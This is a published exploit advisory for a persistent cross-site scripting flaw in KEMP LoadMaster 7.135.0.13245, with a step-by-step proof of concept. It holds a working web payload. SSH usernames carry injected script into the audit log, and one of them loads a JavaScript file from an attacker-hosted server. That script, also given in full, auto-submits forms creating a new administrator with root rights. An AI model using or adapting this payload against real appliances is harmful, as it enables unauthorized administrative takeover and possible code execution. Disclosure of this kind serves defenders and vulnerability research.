KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution

EDB-ID:

42090

CVE:

N/A




Platform:

Multiple

Date:

2017-05-30


Vulnerability Summary

KEMP’s main product, the LoadMaster, is a load balancer built on its own proprietary software platform called LMOS, that enables it to run on almost any platform: As a KEMP LoadMaster appliance, a Virtual LoadMaster (VLM) deployed on Hyper­V, VMWare, on bare metal or in the public cloud. KEMP is available in Azure, where it is in the top 15 deployed applications as well as in AWS and VMWare vCloud Air.

A cross site scripting web vulnerability has been discovered in KEMP LoadMaster v7.135.0.13245 (latest). A non authenticated user is able to inject his own malicious Javascript code into the system and use it to create a new web administrator user.

Vendor response

We were unable to get an update beyond this statement from the vendor: Expect a fix in our new version available Jan 2017.

Vulnerability Details

The issue is located in the System Configuration > System Log Files – View Audit LogFile section.
Once administrative access is obtained, the attacker can use it to execute arbitrary code.

Proof of Concept (PoC):

1 – Verify, in the victim machine the Audit LogFile (System Configuration > System Log Files): it is empty (Image 2)

2 – Inject simple HTML/JS code in the log page, using the ssh client: from an attacker machine open a shell and type the following code:

ssh \<button\ onclick\=alert\(1\)\>Click\ <\/button\>@10.0.8.145

3 – Let the login fail using wrong password (Image 4)

4 – Check again the log page (View Audit LogFile): as you can see the HTML/JS code has been correctly injected (Image 5)

Attack script:

1 – Start a web server and host on attack machine the following JS file (kemp_attack.js)

//BEGIN//////////////////////////////////////////////////////// openl = function(verb, url, data, target) {
var form = document.createElement("form"); form.action = url;
form.method = verb;
form.target = target || "_self";
if (data) {
for (var key in data) {
var input = document.createElement("textarea"); input.name = key;
input.value = typeof data[key] === "object" ?
JSON.stringify(data[key]) : data[key]; form.appendChild(input);
} }
form.style.display = 'none'; document.body.appendChild(form); form.submit();
};
//modify the target IP (10.0.8.145) and user/pass as necessary
openl('POST', 'https://10.0.8.145/progs/useradmin/add', {user:'Peru',pass:'GoSecure!',s:'Add+User'}, 'newWindow'); //modify the target IP as necessary, xuser must be equal to user. Increase the timeout (250) for debug setTimeout(function(){openl('POST', 'https://10.0.8.145/progs/useradmin/setopts', {xuser:'Peru',root:'1'}, 'newWindow');}, 250);
//modify the target IP as necessary. The timeout must be greater than the previous
setTimeout(function(){openl('', 'https://10.0.8.145/', '', 'newWindow');}, 500); //////////////////////////////////////////////////////////END//

2 – Verify permission of kemp_attack.js (chmod 644 kemp_attack.js)

3 – Verify users currently enabled in Kemp LoadMaster from System Configuration > User Management. As you can se no user (a part from default one) is active in the appliance (Image 8)

4 – Inject the attack code: from the attacker machine open a shell and type the following code:

ssh \<script \ src\=\"http\&\#x3A\;\/\/10\.0\.8\.130\/kemp\_attack\.js\"\>\ </script>@10.0.8.145

5 – Check again the log page (View Audit LogFile): this will activate the script

6 – Check again the User Management page: a new user as been created with all permissions.